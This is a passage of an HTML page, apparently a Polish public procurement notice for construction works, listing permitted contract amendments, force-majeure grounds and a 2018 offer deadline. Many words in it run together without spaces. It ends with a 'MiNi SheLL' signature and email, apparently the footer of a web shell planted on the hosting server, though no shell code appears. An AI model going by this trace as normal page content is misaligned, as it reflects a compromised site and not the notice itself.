uzyskania celu oznaczonego w Umowie, a Wykonawca powinien wykonać każde zponiższych poleceń: a) zmniejszyć ilość robót, b) pominąć poszczególne roboty, c) wykonać robotyzamienne. b. Zamawiający dopuszcza zmianę wysokości wynagrodzenia w następującychprzypadkach: a) zmiany stawki podatku od towarów i usług (VAT), przy czym ceny netto określone wofercie i umowie pozostaną niezmienne przez cały okres obowiązywania Umowy. Jeżeli w okresieobowiązywania Umowy nastąpi zmiana stawki podatku VAT, od chwili zmiany podatek w nowejstawce będzie doliczany do dotychczasowych cen netto, bez konieczności zmiany Umowy - jeżelizmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę, b) wykonaniamniejszego zakresu robót, niż zakres określony przez Zamawiającego na etapie ogłoszeniapostępowania o udzielenie niniejszego zamówienia publicznego. Zmniejszenie zakresu robót możewyniknąć w szczególności z ich zaniechania lub wystąpienia okoliczności, o których mowa wUmowie, c) wykonania robót zamiennych i wystąpieniu okoliczności o których mowa w Umowie, d)rezygnacji przez Zamawiającego z realizacji części przedmiotu Umowy. W takim przypadkuwynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci zawszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związkuz wynikającymi z Umowy planowanymi świadczeniami. c. Zamawiający dopuszcza zmianę terminuwykonania robót budowlanych wraz ze skutkami wprowadzenia takiej zmiany, przy czym zmianaspowodowana może być jedynie okolicznościami leżącymi wyłącznie po stronie Zamawiającego lubokolicznościami niezależnymi zarówno od Zamawiającego jak i od Wykonawcy, co może nastąpić m.in. W przypadku: a) nieterminowego przekazania terenu budowy, b) opóźnień w wydawaniu decyzji,zezwoleń, uzgodnień itp. lub w dokonaniu bądź zaniechaniu określonych czynności przez właściweorgany administracji państwowej, które nie są następstwem okoliczności, za które Wykonawca ponosiodpowiedzialność, c) niemożności realizacji robót z powodu braku dopuszczenia do ich wykonania lubnakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy, d)udzielenie zamówień dodatkowych, których wykonanie wpływa na zmianę terminu wykonaniazamówienia podstawowego, e) konieczność realizacji zamówień zamiennych, f) wystąpienia innychokoliczności poza wynikającymi z uchybienia Wykonawcy lub za które Wykonawca nie jestodpowiedzialny, g) gdy Umowa nie może być realizowana z powodu siły wyższej lub z powodunastępstw siły wyższej. Przez termin ,,siła wyższa" rozumie się np. akt terroru, wojny wypowiedziane i niewypowiedziane, blokady, powstania, zamieszki, epidemie, osunięcia gruntu, trzęsienia ziemi,powodzie, wybuchy i inne podobne nieprzewidywalne zdarzenia poza kontrolą którejkolwiek ze Stroni którym żadna ze Stron nie mogła zapobiec, h) wystąpienia zjawisk archeologicznych, niewybuchówlub niewypałów, o ile będą one miały wpływ za dotrzymanie terminu wykonania robót, i) zmiany wuzbrojeniu i naniesieniach terenu w stosunku do danych w zasobach geodezyjnych, mających wpływna termin realizacji, j) jeżeli warunki atmosferyczne uniemożliwiają realizację robót zgodnie zharmonogramem, d. Zamawiający dopuszcza zmianę postanowień Umowy w przypadku zmianyregulacji prawnych wprowadzonych w życie po dacie podpisania Umowy, wywołujących potrzebęzmiany Umowy ze skutkami wprowadzenia takiej zmiany, e. Zamawiający dopuszcza zmianęPodwykonawców, powierzenia wykonania części zakresu Umowy Podwykonawcy lub zmiany zakresuwykonania części zamówienia przez Podwykonawcę pod warunkiem, że kolejny Podwykonawcawykaże spełnianie warunków w zakresie wymaganym przez Zamawiającego na etapie postępowania ozamówienie publiczne - w takim przypadku nie ma konieczności zmiany Umowy w drodze aneksu doUmowy, f. Zamawiający dopuszcza zmianę podmiotów trzecich na zasobach których Wykonawcaopierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem, że kolejnypodmiot trzeci wykaże spełnianie warunków w zakresie wymaganym przez Zamawiającego na etapiepostępowania o zamówienie publiczne, g. Zamawiający dopuszcza zmianę osób odpowiedzialnych zakierowanie robotami budowlanymi oraz osób odpowiedzialnych za realizację zamówienia, podwarunkiem, że zaproponowana przez Wykonawcę na dane stanowisko osoba, wykaże spełnianiewarunków w zakresie nie mniejszym niż Zamawiający określił na etapie postępowania o zamówieniepubliczne - w takim przypadku nie ma konieczności zmiany Umowy w drodze aneksu do Umowy. 2)Opisane wyżej postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę.Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Zmiana Umowy w przypadkachokreślonych wyżej może nastąpić na umotywowany wniosek Wykonawcy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-08-31</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com